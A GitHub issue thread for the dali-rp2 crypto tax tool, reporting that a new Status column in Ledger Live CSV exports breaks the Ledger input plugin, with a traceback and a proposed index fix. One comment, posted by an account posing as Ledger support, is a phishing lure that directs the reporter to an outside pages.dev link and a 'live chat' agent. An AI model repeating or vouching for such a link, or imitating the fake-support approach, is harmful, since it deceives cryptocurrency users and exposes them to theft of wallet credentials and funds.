### ISSUE TITLE
Latest Ledger CSV Exports Changed Indices - New Status Column

### ISSUE THREAD

**Issue by librethanks** [eprbell/dali-rp2#275]
I got the following error when trying to run with the latest Ledger Live exports.

```
ERROR: Fatal exception occurred:
Traceback (most recent call last):
  File "/home/user/.local/lib/python3.10/site-packages/dali/dali_main.py", line 168, in _dali_main_internal
    result_list = pool.map(_input_plugin_helper, input_plugin_args_list)
  File "/usr/lib/python3.10/multiprocessing/pool.py", line 367, in map
    return self._map_async(func, iterable, mapstar, chunksize).get()
  File "/usr/lib/python3.10/multiprocessing/pool.py", line 774, in get
    raise self._value
  File "/usr/lib/python3.10/multiprocessing/pool.py", line 125, in worker
    result = (True, func(*args, **kwds))
  File "/usr/lib/python3.10/multiprocessing/pool.py", line 48, in mapstar
    return list(map(*args))
  File "/home/user/.local/lib/python3.10/site-packages/dali/dali_main.py", line 226, in _input_plugin_helper
    plugin_transactions = input_plugin.load(country)
  File "/home/user/.local/lib/python3.10/site-packages/dali/plugin/input/csv/ledger.py", line 107, in load
    quantity_number: RP2Decimal = RP2Decimal(line[self.__QUANTITY_INDEX])
decimal.InvalidOperation: [<class 'decimal.ConversionSyntax'>]
```
I was able to fix it by removing the status column from the new csv exports.

The new header in the ledger csv export is the following:

`Operation Date,	Status,	Currency Ticker,	Operation Type,	Operation Amount,	Operation Fees,	Operation Hash,	Account Name,	Account xpub,	Countervalue Ticker,	Countervalue at Operation Date,	Countervalue at CSV Export`

I believe the code at: https://github.com/eprbell/dali-rp2/blob/c27aac33bc36f547681ace5076bc407096eecf0c/src/dali/plugin/input/csv/ledger.py#L56

I believe the fix for this should be something along the lines of:
```
class InputPlugin(AbstractInputPlugin):
    __LEDGER: str = "Ledger"

    __TIMESTAMP_INDEX: int = 0
    __CURRENCY_INDEX: int = 2
    __OPERATION_TYPE_INDEX: int = 3
    __QUANTITY_INDEX: int = 4
    __FEE_INDEX: int = 5
    __TRANSACTION_ID_INDEX: int = 6

    __DELIMITER = ","

    __CURRENCY_ALIAS_DICT = {
        "FANTOM": "FTM",
    }
```

**Comment by Fullstack558** [comment]
We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Ledger Support Request](https://chain-dappsrectification.pages.dev)

Use the live chat button at the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

**Comment by eprbell** [comment]
Can you submit a PR?
